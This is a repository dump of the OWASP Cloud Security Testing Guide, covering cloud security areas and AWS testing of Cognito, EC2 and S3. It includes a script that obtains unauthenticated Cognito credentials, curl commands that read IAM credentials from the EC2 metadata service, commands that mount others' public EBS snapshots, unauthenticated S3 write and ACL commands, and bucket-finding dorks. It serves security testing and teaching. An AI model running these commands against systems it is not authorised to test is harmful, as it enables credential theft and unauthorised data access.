├── .github └── ISSUE_TEMPLATE │ ├── content-correction.md │ └── propose-new-content.md ├── Document ├── 0x01-Overview.md ├── 0x02-Amazon-AWS-Testing-Guide.md └── 0x02a-Platform-Overview.md ├── README.md ├── cloud-model.jpg ├── cognito.md ├── ec2.md └── s3.md /.github/ISSUE_TEMPLATE/content-correction.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Content Correction 3 | about: Let us know if you feel there is content that needs correcting. 4 | title: '' 5 | labels: enhancement, invalid 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the issue** 11 | A clear and concise description of what is missing/ wrongly formulated / misspelled (why not create a PR directly?) / lacks effectiveness (in terms of detection or remediation). 12 | 13 | **Optional: Additional context** 14 | Add any other context about the issue here. 15 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/propose-new-content.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Propose New Content 3 | about: Propose additions to the Cloud Security Testing Guide. 4 | title: '' 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | **What would you like added?** 11 | Briefly describe the topic of the new content. Is this a new section or an addition to an existing topic? 12 | 13 | Would you like to be assigned to this issue? 14 | Check the box if you will submit a PR to add the proposed content. Please read CONTRIBUTING.md. 15 | - [ ] Assign me, please! 16 | -------------------------------------------------------------------------------- /Document/0x01-Overview.md: -------------------------------------------------------------------------------- 1 | 2 | # Overview 3 | 4 | ## Introduction to the OWASP Cloud Security Testing Guide 5 | 6 | As the growth and adoption of cloud computing expands, organisations are increasingly migrating their environments into highly dynamic cloud ecosystems. Whilst cloud services may address a number of fundamental historic security risks, they are not fail-safe and operate on a Shared Responsibility Model (https://aws.amazon.com/compliance/shared-responsibility-model/) which means that Security and Compliance is shared between the Cloud Provider and the customer. 7 | 8 | ### Key Areas in Cloud Security 9 | 10 | Security within Cloud environments is heavily influenced by the main models for cloud computing as defined by each Cloud Service Provider. Infrastructure as a Service (IaaS), Platform as a Service (PaaS), Software as a Service (SaaS). 11 | 12 |  13 | 14 | To put simply, depending on the cloud computing model in question, it is a matter of Security "in" the Cloud vs. Security "Of" the Cloud which is defined by the "Shared Responsibility Model" used by each Cloud Service Provider. 15 | 16 | The existence of the Shared Responsibility Model combined with the complexity of cloud services offered by each Cloud Service Providers directly impacts the way security tests are performed in comparison with traditional security assessments. 17 | 18 | In some ways, testers who have experience penetration testing in traditional on-premises environments can easily apply their knowledge when testing the security of cloud assets as the operating systems and applications are fundamentally the same. 19 | 20 | In other ways, the high speed of which Cloud Service Providers release products and services means that penetration testers must continuously maintain in-depth understanding of each new product released by the Cloud Service Provider(s) in order to understand how they can be vulnerable to exploitation, and more importantly, how to secure them from misuse. 21 | 22 | Let's discuss the key areas in cloud service provider security. 23 | 24 | #### Cloud Data Storage 25 | 26 | Cloud Data Storage is a major service offered by the majority of Cloud Service Providers. Cloud storage services are not only used to store non-sensitive but also sensitive objects containing data such as database backups, file-system backups, user credentials, PII and more in resources commonly referred to as "Buckets". 27 | 28 | Although the key to protecting cloud storage services relies on the proper configuration of Access Control Lists (ACLs), there are still factors that can lead to the compromise of data such as the insecure storage of API keys used to provide access to said services. 29 | 30 | When developing applications and networks, we must ensure that authentication credentials such as API keys used to provide access to cloud storage services are considered during the design process. One common bad-practice is when developers hardcode cloud storage service API keys into applications where the source-code is available to end-users, therefore compromising the security of entire cloud storage buckets. 31 | 32 | #### Internal Cloud API Services 33 | 34 | Cloud service providers offer a vast number of internal API endpoints that can accessed on-demand by any processes running on internal assets such as compute services. These internal APIs offer a range of functions such as but not limited to the generation of access credentials, access to instance metadata and access to credential vaults that contain hundreds or in some cases thousands of credentials used by internal resources. 35 | 36 | Although the metadata service is almost never exposed to the internet, it may be indirectly exposed by a vulnerable internet-facing application. For example, a server-side request forgery (SSRF) vulnerability in a cloud hosted web-application could expose the metadata service to the entire internet. Attackers may use the leaked metadata to further compromise internal assets or even compromise the entire cloud infrastructure. 37 | 38 | Metadata APIs can be most effectively protected by Cloud Service Providers, however, if such protection is not available, organisations should enforce preventative measures to minimise the risk by implementing network layer controls to prevent unnecessary access to the internal APIs combined with least privilege specifically for IAM roles and only allow the services or processes needed be able to query the internal APIs. 39 | 40 | #### Authentication and Authorisation 41 | 42 | Authenticating to cloud environments can be performed using a number of methods such as but not limited to: Console access, API access and IAM Access all with their own unique access control policies and rules. Statistically speaking, the more accounts and authentication methods used by an organisation, the higher chance there is for these accounts to be compromised. 43 | 44 | It is not uncommon for cloud access keys to be exposed. They can be exposed within public source code repositories, unprotected issue trackers, unprotected Kubernetes dashboards, and other such sources. 45 | 46 | Organisations should take extra precaution to securely store their keys, creating unique keys for each external service and restricting access following the principle of least privilege. 47 | 48 | 49 | #### Architecture Design 50 | 51 | Not all security issues within cloud environments are directly caused by vulnerable software. Just as traditional networks require carefully planned architecture using practices such as risk assessments, threat modelling and security requirements, so do structure of cloud environment networks need careful design to increase resilience and prevent attackers from easily pivoting throughout internal cloud networks after exploiting a single vulnerability. 52 | 53 | When testing cloud environments it is important to address any poorly implemented security architecture such as but not limited to, overly excessive port access for compute resources that should only have service-specific ports open. 54 | 55 | Each cloud environment and organisation will have different technical and business requirements that will influence the structure of their internal cloud architecture, testers must be able to identify risks within these designs and recommend changes where necessary to avoid unnecessary exposure or high-risk configurations. 56 | 57 | #### Secure Configuration & Monitoring 58 | 59 | For the most part, a large percentage of the security issues that are exploited within a cloud environment can be mitigated with sufficient configuration and monitoring. 60 | 61 | From a testing perspective, almost all of the tools that have been designed to audit the security of cloud environments perform configuration checks which are matched against specific best-practices or compliance benchmarks such as NIST and CIS. Although this means that some testing can be automated, Cloud Service Providers continuously update, modify and release new cloud products and services which means that testers must not solely rely on available scanning tools to review security and monitoring configurations. 62 | 63 | 64 | ## Navigating the Cloud Security Testing Guide 65 | 66 | The CSTG contains the following main sections: 67 | 68 | 1. The [Amazon Web Services Testing Guide]() covers Amazon Web Services testing methodologies and cloud service provider overview and security best-practices. 69 | 70 | 2. The [Microsoft Azure Testing Guide]() covers Microsoft Azure testing methodologies and cloud service provider overview and security best-practices. 71 | 72 | 3. The [Google Cloud Testing Guide]() covers Google Cloud Platform testing methodologies and cloud service provider overview and security best-practices. 73 | -------------------------------------------------------------------------------- /Document/0x02-Amazon-AWS-Testing-Guide.md: -------------------------------------------------------------------------------- 1 | # Amazon AWS Testing Guide 2 | -------------------------------------------------------------------------------- /Document/0x02a-Platform-Overview.md: -------------------------------------------------------------------------------- 1 | 2 | ## Amazon AWS Platform Overview 3 | 4 | Security and Compliance is a shared responsibility between AWS and the customer. This section introduces the Amazon AWS platform from an architecture point of view. The following areas are discussed: 5 | 6 | - AWS responsibility "Security of the Cloud" 7 | - Customer responsibility "Security in the Cloud" 8 | 9 | 10 |  11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [](https://creativecommons.org/licenses/by-sa/4.0/ "CC BY-SA 4.0") 2 | 3 | [](https://github.com/OWASP/Cloud-Testing-Guide) 4 | 5 | # OWASP Cloud Security Testing Guide 6 | This is the official GitHub Repository of the OWASP Cloud Security Testing Guide (CSTG). The CSTG is designed to be a comprehensive guide for developers, cloud architects, security testers and anyone else involved in the securing of cloud environments. 7 | 8 | The high speed in which Cloud Service Providers release and update products and services means that anyone responsible for securing such environments must continuously maintain an in-depth understanding of each Cloud Service Provider(s) offerings. 9 | 10 | For this reason, The CSTG combines comprehensive, objective technical processeses for testing the security of Cloud environments combined with a high level view of the key areas in cloud security. 11 | 12 | 13 | 14 | 15 | ## Table-of-Contents 16 | 17 | ### Introduction 18 | 19 | 20 | - [Introduction to the Cloud Security Testing Guide](Document/0x01-Overview.md) 21 | 22 | 23 | ### Key Areas in Cloud Security 24 | 25 | - [Cloud Data Storage](Document/0x01-Overview.md#cloud-data-storage) 26 | - [Internal Cloud API Services](Document/0x01-Overview.md#internal-cloud-api-services) 27 | - [Authentication and Authorization](Document/0x01-Overview.md#authentication-and-authorization) 28 | - [Architecture Design](Document/0x01-Overview.md#architecture-design) 29 | - [Secure Configuration & Monitoring](Document/0x01-Overview.md#secure-configuration--monitoring) 30 | 31 | ## Amazon AWS Testing Guide 32 | 33 | - [Platform Overview](Document/0x02a-Platform-Overview.md) 34 | - [Basic Security Testing]() 35 | - [Access Methods]() 36 | - [Resource Inventory]() 37 | 38 | 39 | ### Compute Services 40 | - [Amazon Elastic Compute Cloud (Amazon EC2)]() 41 | - [AWS Lambda]() 42 | - [Amazon Elastic Container Registry (ECR)]() 43 | 44 | ### Networking 45 | - [VPC] 46 | 47 | ### Cloud Data Storage 48 | - [Amazon Simple Storage Service (Amazon S3)]() 49 | - [Amazon Elastic Block Store (Amazon EBS)]() 50 | 51 | ## Microsoft Azure Testing Guide 52 | 53 | ## Project Leaders 54 | - [Stefano Di Paola](https://github.com/wisec) 55 | - [Jamieson O'Reilly](https://github.com/orlyjamie) 56 | -------------------------------------------------------------------------------- /cloud-model.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OWASP/owasp-cstg/05ef619177472bcd34d1e1b215873a3fcdb58617/cloud-model.jpg -------------------------------------------------------------------------------- /cognito.md: -------------------------------------------------------------------------------- 1 | # Cognito Overview 2 | 3 | Cognito provides developers with an authentication, authorization and user management system that can be implemented in web applications. Cognito is divided in two main components: User PoolsAmazon Cognito User Pool https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-identity-pools.html and Identity PoolsAmazon Cognito Identity Pools https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-identity.html. The Amazon documentation on Cognito states that: 4 | 5 |
6 | User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.What is Amazon Cognito? https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html7 | 8 | From a security perspective, identity pools in Cognito is interesting as it can provide access to other Amazon Web Services. 9 | 10 | 11 | === Identity Pools === 12 | Identity pools are identified by an ID that looks like the following 13 |
14 | us-east-1:1a1a1a1a-ffff-1111-9999-12345678 15 |16 | 17 | A web application will thus query Cognito by specifying the proper Identity pool ID in order to get temporary limited-privilege AWS credentials to access other AWS services. An identity pool also allows to specify a role for users that are not authenticated. 18 | In the Cognito configuration page, there is the option to enable Unauthenticated identities which, as Amazon describes it: 19 | 20 |
21 | Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login. 22 |23 | 24 | '''Example:'''
boto3
boto3
https://boto3.amazonaws.com/v1/documentation/api/latest/index.html:
27 | 28 | pip install boto3 29 |30 | 31 | In the following script, just replace
IDENTITY_POOL
with the target Identity Pool ID.
32 |
33 | 34 | import boto3 35 | from botocore.exceptions import ClientError 36 | 37 | try: 38 | # Get access token 39 | client = boto3.client('cognito-identity', region_name="us-east-2") 40 | resp = client.get_id(IdentityPoolId=[IDENTITY_POOL]) 41 | 42 | print "\nIdentity ID: %s"%(resp['IdentityId']) 43 | print "\nRequest ID: %s"%(resp['ResponseMetadata']['RequestId']) 44 | resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId']) 45 | secretKey = resp['Credentials']['SecretKey'] 46 | accessKey = resp['Credentials']['AccessKeyId'] 47 | sessionToken = resp['Credentials']['SessionToken'] 48 | print "\nSecretKey: %s"%(secretKey) 49 | print "\nAccessKey ID: %s"%(accessKey) 50 | print "\nSessionToken %s"%(sessionToken) 51 | 52 | # Get all buckets names 53 | s3 = boto3.resource('s3',aws_access_key_id=accessKey, aws_secret_access_key=secretKey, aws_session_token=sessionToken, region_name="eu-west-1") 54 | print "\nBuckets:" 55 | for b in s3.buckets.all(): 56 | print b.name 57 | 58 | except (ClientError, KeyError): 59 | print "No Unauth" 60 | exit(0) 61 |62 | 63 | In the case unauthenticated access to S3 buckets is allowed, the output should look like this: 64 |
65 | Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944 66 | Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793 67 | SecretKey: wJE/[REDACTED]Kru76jp4i 68 | AccessKey ID: ASI[REDACTED]MAO3 69 | SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF 70 | 71 | Buckets: 72 | bucket-test-01 73 | bucket-test-02 74 |75 | 76 | == References == 77 | 78 | -------------------------------------------------------------------------------- /ec2.md: -------------------------------------------------------------------------------- 1 | == Elastic Compute Cloud (EC2) Overview == 2 | Elastic Compute Cloud (EC2) is a widely used service offered by Amazon. It allows to rent virtual computers that can be used to run arbitrary applications. EC2 provides a scalable solution to deploy a new computer, which in AWS terminology is called an "instance", and mange its status via a web-based user interface. The user can manage every aspect of an EC2 instance from the creation and execution to the definition of access policies. EC2 instances provide many different features two of which are particular relevant when from a security perspective: Elastic Block StoreElastic Block Store https://aws.amazon.com/ebs/ and Instance Metadata ServiceInstance Metadata and User data https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html. 3 | 4 | 5 | 6 | === Publicly accessible EC2 snapshots === 7 | EBS snapshots are, by default, stored in a private S3 bucket that is not directly accessible via the S3 dashboard. However, EBS snapshots are manageable via the EC2 interface and their permissions can be changed to be public. If an EBS snapshot is publicly accessible, it is possible to have access to the EBS block by mounting it in an EC2 instance under your control. EBS block are essentially as a virtual disk that can be mounted like any other virtual disk in EC2. To mount an EBS block two things are needed: 8 | 9 | # an EC2 instance under where the EBS snapshot can be mounted to; 10 | # the ID that identifies the EBS snapshot. 11 | 12 | To get an EC2 instance refer to the AWS documentation of how to create and launch an EC2 instanceCreate Your EC2 Resources and Launch Your EC2 Instance https://docs.aws.amazon.com/efs/latest/ug/gs-step-one-create-ec2-resources.html. 13 | 14 | To get the ID that identifies an EBS snapshot, the
aws
command line tool can be used to search for publicity accessible EBS snapshots:
15 |
16 | 17 | aws --profile [PROFILE] ec2 describe-snapshots --filters [FILTERS] --region [REGION] 18 |19 | 20 | The command above will respond with a JSON listing all the publicly available snapshots that satisfies the values specified by the
--filters
flag (for a complete description of the kind of filters refer to the documentationdescribe-snapshot
https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-snapshots.html). The JSON will contain information about the snapshot along with SnapshotId
that identifies the EBS snapshot. For example, to list all the publicly accessible snapshots containing the word backup and located in the east-us-2 region use the following command:
21 |
22 | 23 | aws --profile default ec2 describe-snapshots --filters Name=description,Values="*backup*" --region east-us-2 24 |25 | 26 | The result of executing the command above would output a JSON listing all the publicly accessible snapshots satisfying the search criteria. 27 | 28 |
29 | { 30 | "Snapshots": [ 31 | { 32 | "Description": "Phoenix_competitor_analysis_backup_set", 33 | "Encrypted": false, 34 | "VolumeId": "vol-ffffffff", 35 | "State": "completed", 36 | "VolumeSize": 100, 37 | "StartTime": "2017-08-30T05:24:48.000Z", 38 | "Progress": "100%", 39 | "OwnerId": "234190327268", 40 | "SnapshotId": "snap-0dc716aaf28921496" 41 | }, 42 | { 43 | "Description": "backup", 44 | "Encrypted": false, 45 | "VolumeId": "vol-0b21c8a6c158367fc", 46 | "State": "completed", 47 | "VolumeSize": 8, 48 | "StartTime": "2018-05-21T13:01:49.000Z", 49 | "Progress": "100%", 50 | "OwnerId": "388304843501", 51 | "SnapshotId": "snap-041c06c0c3658323c" 52 | }, 53 | { 54 | "Description": "backup", 55 | "Encrypted": false, 56 | "VolumeId": "vol-0ee056a878d9dfdb1", 57 | "State": "completed", 58 | "VolumeSize": 30, 59 | "StartTime": "2018-01-07T13:52:56.000Z", 60 | "Progress": "100%", 61 | "OwnerId": "682345607706", 62 | "SnapshotId": "snap-0e793674b08737e95" 63 | }, 64 | { 65 | "Description": "copy of backup sprerdda - BAckup-17-8-2018", 66 | "Encrypted": false, 67 | "VolumeId": "vol-ffffffff", 68 | "State": "completed", 69 | "VolumeSize": 30, 70 | "StartTime": "2018-08-22T15:03:48.179Z", 71 | "Progress": "100%", 72 | "OwnerId": "869858413856", 73 | "SnapshotId": "snap-02326682d84d3aedd" 74 | } 75 | ] 76 | } 77 |78 | 79 | Once the snapshot has been identified, it is possible to mount it by creating an EBS volume in your account: 80 | 81 |
82 | aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id [SNAPSHOT_ID] 83 |84 | 85 | === Metadata leakage === 86 | EC2 instances have something called Instance Metadata Service (IMS). IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or managing the running instance. IMS is accessible from within the instance itself by querying the end-point located at http://169.254.169.254. 87 | 88 | IMS returns many interesting information such as the one shown in the table below (for a complete list refer to the Instance Metadata CategoryInstance Metadata Category https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories documentation). 89 | 90 | {| class="wikitable" 91 | |- 92 | |http://169.254.169.254/latest/meta-data/ami-id 93 | |The AMI ID used to launch the instance. 94 | |- 95 | |http://169.254.169.254/latest/meta-data/iam/security-credentials/ 96 | |If there is an IAM role associated it returns its name (which can be used in the next handler). 97 | |- 98 | |http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name 99 | |If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role (for more information, see Retrieving Security Credentials from Instance Metadata). Otherwise, not present. 100 | |- 101 | |http://169.254.169.254/latest/user-data 102 | |Returns a user-defined script which is run every time a new EC2 instance is launched for the first time. 103 | |} 104 | 105 | 106 | Examples: 107 | Command: 108 |
109 | curl http://169.254.169.254/latest/meta-data/ami-id 110 |111 | Output: 112 |
113 | ami-336b4456 114 |115 | 116 | Command: 117 |
118 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 119 |120 | Output: 121 |
122 | IAM_TEST_S3_READ 123 |124 | 125 | Command: 126 |
127 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_TEST_S3_READ 128 |129 | Output: 130 |
131 | { 132 | "Code" : "Success", 133 | "LastUpdated" : "2018-08-27T15:23:14Z", 134 | "Type" : "AWS-HMAC", 135 | "AccessKeyId" : "AS[REDACTED]TEM", 136 | "SecretAccessKey" : "EgKirlp[REDACTED]hkYp", 137 | "Token" : "FQoGZXIvYXdzEJH//////////wE[REDACTED]=", 138 | "Expiration" : "2018-08-27T21:36:24Z" 139 | } 140 |141 | 142 | Command: 143 |
144 | curl http://169.254.169.254/latest/user-data 145 |146 | Output: 147 |
148 | #!/bin/bash -xe 149 | sudo apt-get update 150 | # install coturn 151 | apt-get install -y coturn 152 | # install kms 153 | sudo apt-get update 154 | sudo apt-get install -y wget 155 | echo "deb http://ubuntu.kurento.org xenial kms6" | sudo tee /etc/apt/sources.list.d/kurento.list 156 | wget -O - http://ubuntu.kurento.org/kurento.gpg.key | sudo apt-key add - 157 | sudo apt-get update 158 | sudo apt-get install -y kurento-media-server-6.0 159 | systemctl enable kurento-media-server-6.0 160 | # enable coturn 161 | sudo echo TURNSERVER_ENABLED=1 > /etc/default/coturn 162 | # turn config file 163 | sudo cat >/etc/turnserver.conf<<-EOF 164 | [...] 165 | 166 | sudo /usr/local/bin/cfn-signal -e $? --stack arn:aws:cloudformation:us-east-2:118366151276:sta 167 |168 | 169 | To being able to access such information, the attacker has to find a way to query
http://169.254.169.254
from within the EC2 instance itself. There are many ways in which this can be accomplished from being able to find a Server Side Request Forgery (SSRF) vulnerabilityAbusing the AWS metadata service using SSRF vulnerabilities https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/When a web application SSRF causes the cloud to rain credentials & more https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/when-a-web-application-ssrf-causes-the-cloud-to-rain-credentials-and-more/, or exploit a proxy setup on the EC2 instance all the way to DNS rebindingDNS Rebinding Headless Browsers https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/.
170 |
171 | == External Resources ==
172 | This is a collection of additional external resources related to testing EC2.
173 |
174 | * DNS Rebinding Headless Browsers (https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/)
175 | * Cloud Metadata (https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb)
176 | * Abusing the AWS metadata service using SSRF vulnerabilities (https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/)
177 | * EC2's most dangerous feature (http://www.daemonology.net/blog/2016-10-09-EC2s-most-dangerous-feature.html)
178 |
179 | == References ==
180 |
181 |
--------------------------------------------------------------------------------
/s3.md:
--------------------------------------------------------------------------------
1 | == Simple Storage Service (S3) Overview ==
2 | Simple Storage Service (S3) is among the most popularThe Most Popular AWS Products of 2018 https://www.clickittech.com/aws/top-10-aws-services/Top 10 AWS services you should know about (2019 Edition) https://www.2ndwatch.com/blog/popular-aws-products-2018/ of the AWS services and provides a scalable solution for objects storage via web APIsAmazon S3 - Wikipedia https://en.wikipedia.org/wiki/Amazon_S3. S3 buckets can be employed for many different usage and in many different scenarios.
3 | mybucket
, it is possible to access the bucket via the following URLs:
15 |
16 | 17 | https://s3-[region].amazonaws.com/[bucketname]/ 18 |19 | Where
[region]
depends on the one selected during bucket creation.
20 |
21 | 22 | https://[bucketname].s3.amazonaws.com/ 23 |24 | 25 | S3 also provides the possibility of hosting static HTML content thus making an S3 bucket behaving as a static HTML web server. If this option is selected for a bucket, the following URL can be used to access the HTML code contained in that bucket: 26 | 27 |
28 | https://[bucketname].s3-website-[region].amazonaws.com/ 29 |30 | 31 | === Identifying S3 buckets === 32 | The first step when testing a web application that makes use of AWS S3 buckets is identifying the bucket(s) itself, meaning the URL that can be used to interact with the bucket. 33 | '''Note:''' it is not necessary to know the region of a S3 bucket to identify it. Once the name is found, it is possible to cicle 34 | 35 | ==== HTML Inspection ==== 36 | The web application might expose the URL to the S3 bucket directly within the HTML code. To search for S3 bucket within HTML code, inspect the code in search of sub-string such as: 37 |
38 | s3.amazonaws 39 | amazonaws 40 |41 | 42 | ==== Brute force \ Educated guessing ==== 43 | A brute-force approach, possibly based on a word-list of common words along with specific words coming from the domain under testing, might be useful in identifying S3 buckets. 44 | As described in the previous section, S3 buckets are identified by a predefined and predictable schema that can be useful for buckets identification. By means of an automatic tool it is possible to test multiple URLs in search of S3 buckets starting from a word-list. 45 | 46 | In OWASP ZAP (v2.7.0) the fuzzer feature can be used for testing: 47 | # With OWASP ZAP up and running, navigate to
https://s3.amazonaws.com/bucket
to generate a request to https://s3.amazonaws.com/bucket
in the Sites
panel;
48 | # From the Sites
panel, right click on the GET request and select Attack -> Fuzz
to configure the fuzzer;
49 | # Select the word bucket
from the request to tell the fuzzer to fuzz in that location;
50 | # Click Add
and Add
again to specify the payload the fuzzer will use;
51 | # Select the type of payload, which could be a list of string given to ZAP itself or loaded from a file;
52 | # Finally, press Add
to add the payload, Ok
to confirm the setting and Start Fuzzer
to star fuzzing.
53 |
54 | If a bucket is found, ZAP will show a response with status code 301 Moved Permanently
on the other hand, if the bucket does not exist, the response status will be 404 Not Found
.
55 |
56 | ==== Google Dork ====
57 | Google DorkGoogle Hacking - Wikipedia https://en.wikipedia.org/wiki/Google_hacking can also be used to search for S3 buckets URLs. The Inurl
directive provided by Google can be used to search for S3 buckets. For example, the Inurl
directive can be used to search for common names as shown in the following list:
58 |
59 | 60 | Inurl: s3.amazonaws.com/legacy/ 61 | Inurl: s3.amazonaws.com/uploads/ 62 | Inurl: s3.amazonaws.com/backup/ 63 | Inurl: s3.amazonaws.com/mp3/ 64 | Inurl: s3.amazonaws.com/movie/ 65 | Inurl: s3.amazonaws.com/video/ 66 | inurl: s3.amazonaws.com 67 |68 | 69 | More Google DorksGoogle hacking Amazon Web Services Cloud front and S3 https://it.toolbox.com/blogs/rmorril/google-hacking-amazon-web-services-cloud-front-and-s3-011613 can be used for S3 buckets identification. 70 | 71 | ==== Bing reverse IP ==== 72 | Microsoft's Bing search engine can be helpful in identifying S3 buckets thanks to its feature of searching domains given an IP address. Given the IP address of a known S3 end-point, the ip:[IP] feature of Bing can be used to retrieve other S3 buckets resolving to the same IP. 73 | 74 | ==== DNS Caching ==== 75 | There are many services that maintain a DNS cache that can be queried by users to find domain names correspondence from IP address and vice versa. By taking advantage of such services it is possible to identify S3 buckets. The following list shows some services worth noting: 76 | 77 |
78 | https://findsubdomains.com/ 79 | https://www.robtex.com/ 80 | https://buckets.grayhatwarfare.com/ (created specifically to collect AWS S3 buckets) 81 |82 | 83 | The following is a screenshot from https://findsubdomains.com showing how it is possible to retrieve S3 buckets by searching for subdomains of
s3.amazonaws.com
.
84 |
85 | === S3 buckets permissions ===
86 |
87 | An S3 bucket provides a set of five permissions that can be granted at the bucket level or at the object level.
88 | S3 buckets permissions can be tested via two means: HTTP request or by using the aws
command line tool.
89 |
90 | READ
91 |
92 | At bucket level allows the to list the objects in the bucket.
93 | At object level allows to read the content as well as the metadata of the object.
94 |
95 | WRITE
96 |
97 | At bucket level allows to create, overwrite, and delete objects in the bucket.
98 | At object level allows to edit the object itself.
99 |
100 | READ_ACP
101 |
102 | At bucket level allows to read the bucket’s Access Control List.
103 | At object level allows to read the object’s Access Control List.
104 |
105 | WRITE_ACP
106 |
107 | At bucket level allows to set the Access Control List for the bucket.
108 | At object level allows to set an Acess Control List for the object.
109 |
110 | FULL_CONTROL
111 |
112 | At bucket level is equivalent to granting the READ
, WRITE
, READ_ACP
, and WRITE_ACP
permissions.
113 | At the object levelis equivalent to granting the READ
, WRITE
, READ_ACP
, and WRITE_ACP
.
114 |
115 | ==== READ
Permission ====
116 | Via HTTP, try to access the bucket by requesting the following URL:
117 | 118 | https://[bucketname].s3.amazonaws.com 119 |120 | It is also possible to use the
aws
aws s3 ls
documentation https://docs.aws.amazon.com/cli/latest/reference/s3/ls.html command line tool to list the content of a bucket:
121 | aws s3 ls s3://[bucketname] --no-sign-request122 | '''Note:''' the
-no-sign-request
flag specifies to not use credential to sign the request.
123 |
124 | ==== WRITE
Permission ====
125 | Via the aws
command line tool it is possible to write to a bucket aws cp
documentation https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html line:
126 | 127 | aws s3 cp localfile s3://[bucketname]/file.txt --no-sign-request 128 |129 | A bucket that allows arbitrary file upload will answer with a message showing that the file has been uploaded, such as the following: 130 |
131 | upload: localfile to s3://[bucketname]/file.txt 132 |133 | '''Note:''' the
-no-sign-request
flag specifies to not use credential to sign the request.
134 |
135 | ==== READ_ACL
Permission ====
136 | Via the aws
command line tool it is possible to test READ_ACL
for both an S3 bucketaws s3api get-bucket-acl
documentation https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html and single objectsaws s3api get-object-acl
documentation https://docs.aws.amazon.com/cli/latest/reference/s3api/get-object-acl.html.
137 |
138 | Testing bucket for READ_ACL
:
139 |
140 | 141 | aws s3api get-bucket-acl --bucket [bucketname] --no-sign 142 |143 | 144 | Testing single object for
READ_ACL
:
145 | 146 | aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request 147 |148 | 149 | Both commands will output a JSON showing the ACL policies for the specified resource. 150 | 151 | '''Note:''' the
-no-sign-request
flag specifies to not use credential to sign the request.
152 |
153 | ==== WRITE_ACL
Permission ====
154 | Via AWS command line it is possible to test WRITE_ACL
for both an S3 bucketaws s3api put-bucket-acl
https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-acl.html and single objectsaws s3api put-object-acl
https://docs.aws.amazon.com/cli/latest/reference/s3api/put-object-acl.html.
155 |
156 | Testing bucket for WRITE_ACL
:
157 |
158 | 159 | aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request 160 |161 | 162 | Testing single object for
WRITE_ACL
:
163 | 164 | aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request 165 |166 | 167 | Both commands do not display an output in case of operation successful. 168 | 169 | '''Note:''' the
-no-sign-request
flag specifies to not use credential to sign the request.
170 |
171 | ==== Any authenticated AWS client ====
172 | Finally, S3 permissions used to include a peculiar grant named "any authenticated AWS client". This permission allows any AWS member, regardless of who they are, access to the bucket. This feature is not provided anymore but there are still buckets with this permission enabled.
173 | To test for this type of permission, create an AWS account and configure it locally with the aws
command line:
174 |
175 | 176 | aws configure 177 |178 | 179 | Try to access the bucket with the same commands described above, the only difference is that the flag
--no-sign-request
should be replaced with --profile [PROFILENAME]
where [PROFILENAME]
is the name of the profile created with the configure
command.
180 |
181 | == External Resources ==
182 | This is a collection of additional external resources related to testing S3 buckets.
183 |
184 | * My arsenal of AWS security tools (https://blyx.com/2018/07/18/my-arsenal-of-aws-security-tools/)
185 | * My Arsenal of Cloud Native (Security) Tools (https://www.marcolancini.it/2018/blog-arsenal-cloud-native-security-tools/)
186 | * AWS Security Checks (https://github.com/PortSwigger/aws-security-checks)
187 | * boto: A Python interface to Amazon Web Services (http://boto.cloudhackers.com/en/latest/)
188 | * AWS Extender (https://github.com/VirtueSecurity/aws-extender)
189 | * RhinoSecurityLabs aws-pentest-tools (https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools)
190 |
191 | == References ==
192 |
193 |
--------------------------------------------------------------------------------